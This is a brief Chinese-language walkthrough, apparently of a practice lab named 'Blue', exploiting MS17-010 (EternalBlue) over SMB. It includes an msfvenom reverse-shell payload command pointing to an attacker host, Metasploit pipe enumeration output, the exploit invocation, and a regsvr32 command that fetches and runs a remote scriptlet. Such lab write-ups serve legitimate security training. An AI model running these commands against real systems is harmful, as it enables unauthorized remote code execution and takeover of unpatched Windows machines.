nmap掃描發(fā)現(xiàn)139,445端口開啟,再加上靶機(jī)名叫blue,很容易想到17-010
圖片.png
直接改17-010的py腳本
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
把原來注釋的兩行,改改
圖片.png
同時我們需要生產(chǎn)一個exe文件,來讓目標(biāo)靶機(jī)執(zhí)行
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.5 lport=5678 -f exe > /tmp/exp.exe
存放的路徑要跟腳本的路徑對應(yīng)起來
腳本執(zhí)行的時候,需要有pipe name,用來把exe文件傳到靶機(jī)上
msf中的auxiliary/scanner/smb/pipe_auditor
模塊,可以掃描到開放的pipe
msf5 auxiliary(scanner/smb/pipe_auditor) > exploit
[+] 10.10.10.40:445 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \LSM_API_ser vice, \ntsvcs, \plugplay, \protected_storage, \scerpc, \srvsvc, \trkwks, \wkssvc
[*] 10.10.10.40: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
執(zhí)行腳本,并且從pipe掃描中隨便拿一個用,同時另外一邊開啟nc監(jiān)聽
python 42315.py 10.10.10.40 lsarpc
圖片.png
還有另一正思路,雖然沒成功
直接讓目標(biāo)靶機(jī)執(zhí)行命令
圖片.png
use exploit/multi/script/web_delivery
set target 3
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.40
exploit
regsvr32 /s /n /u /i:regsvr32 /s /n /u /i:http://10.10.14.5:9999/xE1H8gb6.sct scrobj.dll